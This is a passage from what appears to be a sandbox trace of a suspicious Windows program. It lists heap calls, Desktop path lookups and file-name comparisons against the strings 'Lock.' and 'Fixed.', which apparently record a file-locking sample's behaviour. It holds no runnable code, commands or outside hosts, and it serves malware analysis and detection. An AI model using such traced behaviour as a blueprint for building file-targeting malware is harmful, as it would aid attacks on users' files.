Flags=0x0, Size=0x64) returned 0x24202f0 [0188.649] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPqP3gN.pps", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPqP3gN.pps", lpFilePart=0x8bf658*="OPqP3gN.pps") returned 0x31 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0188.649] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPqP3gN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opqp3gn.pps")) returned 0xffffffff [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.650] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0188.650] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.650] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0188.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QHREQz7Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HREQz7Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REQz7Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQz7Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qz7Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xz.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0188.651] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0188.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6cb0 [0188.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0188.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QHREQz7Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HREQz7Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REQz7Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQz7Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qz7Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.652] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xz.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0188.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0188.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0188.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.653] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0188.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0188.654] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0188.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0188.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.654] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0188.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0188.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.656] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0188.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0188.657] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.658] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0188.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0188.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0188.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0188.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0188.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 